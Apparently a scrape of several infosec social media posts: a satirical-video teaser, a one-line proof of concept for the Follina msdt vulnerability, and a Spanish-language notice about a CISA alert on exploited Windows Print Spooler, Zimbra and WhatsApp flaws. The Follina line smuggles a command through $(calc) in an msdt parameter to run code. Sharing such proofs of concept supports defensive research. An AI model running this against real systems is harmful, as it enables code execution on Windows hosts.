I usually make short-form satirical videos for fun, but never share them with the world. This time tho, I thought I'd make one for the infosec community. Some might even find it educational 😅
If you're in #infosec and you feel a little down this week, this video is for you💙
msdt #follina run from CLI directly doesn't require the "IT_RebrowseForFile" nor "ms-msdt". See minimal POC below
msdt /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
⚠️ La CISA emitió una nueva alerta informando que cibercriminales están explotando una vulnerabilidad recientemente identificada en Windows Print Spooler, así como otras dos en Zimbra y WhatsApp.
Échale un vistazo al anuncio para reducir tu exposición: https://t.co/66Z1BuZuaM